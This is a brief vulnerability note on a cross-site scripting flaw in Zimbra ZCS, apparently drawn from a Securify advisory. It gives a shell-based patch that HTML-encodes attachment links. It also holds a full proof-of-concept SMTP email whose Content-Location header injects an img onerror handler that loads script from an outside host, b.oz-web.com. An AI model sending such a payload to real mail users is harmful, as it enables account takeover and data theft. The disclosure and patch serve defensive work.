Abusing missing input sanitization in Zimbra ZCS leads to arbitary JavaScript being loaded when opening an email. Credits to: Securify.nl https://www.securify.nl/advisory/SFY20180101/cross-site-scripting-vulnerability-in-zimbra-collaboration-suite-due-to-the-way-it-handles-attachment-links.html
No restart are required on your Zimbra servers.
$ cd /opt/zimbra/jetty_base/webapps/zimbra/js/
$ gunzip -S zgz MailCore_all.js.zgz
$ vi MailCore_all.js.
replace:
o[t++]=e?"href='"+e+"' ":"";
with:
o[t++]=e?"href='"+AjxStringUtil.htmlEncode(e)+"' ":"";
$ gzip -S zgz MailCore_all.js.
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
From: <[email protected]>
To: <[email protected]>
Subject: Open me for free money
Content-Type: multipart/mixed; boundary="----=_Part_112602234_144352703.1515072325170"
------=_Part_112602234_144352703.1515072325170
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 7bit
Some text !
------=_Part_112602234_144352703.1515072325170
Content-Type: text/plain; name=attachment.txt
Content-Disposition: attachment; filename=attachment.txt
Content-Transfer-Encoding: base64
Content-Location: http://foo.bar'></a><img src=a onerror=window.x=document.createElement('script');window.x.src='http://b.oz-web.com/X';document.body.appendChild(window.x)><a href='
YXR0YWNobWVudAo=
------=_Part_112602234_144352703.1515072325170--
.